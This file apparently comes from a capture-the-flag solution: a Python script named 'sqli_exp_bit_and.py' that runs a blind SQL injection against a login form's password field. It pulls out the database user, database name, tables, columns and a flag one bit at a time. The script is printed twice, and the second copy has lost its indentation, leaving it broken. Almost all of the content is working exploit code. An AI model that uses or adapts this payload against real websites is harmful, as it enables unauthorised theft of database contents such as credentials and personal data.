waderwu/sqli_exp_bit_and.py

## sqli_exp_bit_and.py
#!/usr/bin/env python3
import requests

client = requests.Session()
debug = False

def get(url, data, headers=None):
    if not headers:
        headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
    proxies = {'http':'http://127.0.0.1:8080'}
    r = None
    if debug:
        r = client.get(url, params=data, headers=headers, proxies=proxies)
    else:
        r = client.get(url, params=data, headers=headers)
    return r

def exp():
    query = "select user()"
    query = "select database()"
    query = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
    query = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='bool'"
    query = "select flag from flag limit 1"
    flag = ""
    for index in range(1, 40):
        print(index)
        guess = 0
        for bit in range(8):
            base = pow(2, bit)
            payload = "xx1' or (ord(substr((%s),%d,1))&%d)=0#"%(query, index, base)
            data = {'user':'user', 'pass':payload}
            r = get(url, data=data)
            # print(r.text)
            if "wrong" in r.text:
                guess += base
        flag += chr(guess)
        print(flag)

if __name__ == "__main__":
    url = "http://xxxx.com/x.php"
    exp()
	#!/usr/bin/env python3
	import requests

	client = requests.Session()
	debug = False

	def get(url, data, headers=None):
	if not headers:
	headers = {}
	headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
	proxies = {'http':'http://127.0.0.1:8080'}
	r = None
	if debug:
	r = client.get(url, params=data, headers=headers, proxies=proxies)
	else:
	r = client.get(url, params=data, headers=headers)
	return r

	def exp():
	query = "select user()"
	query = "select database()"
	query = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
	query = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='bool'"
	query = "select flag from flag limit 1"
	flag = ""
	for index in range(1, 40):
	print(index)
	guess = 0
	for bit in range(8):
	base = pow(2, bit)
	payload = "xx1' or (ord(substr((%s),%d,1))&%d)=0#"%(query, index, base)
	data = {'user':'user', 'pass':payload}
	r = get(url, data=data)
	# print(r.text)
	if "wrong" in r.text:
	guess += base
	flag += chr(guess)
	print(flag)

	if __name__ == "__main__":
	url = "http://xxxx.com/x.php"
	exp()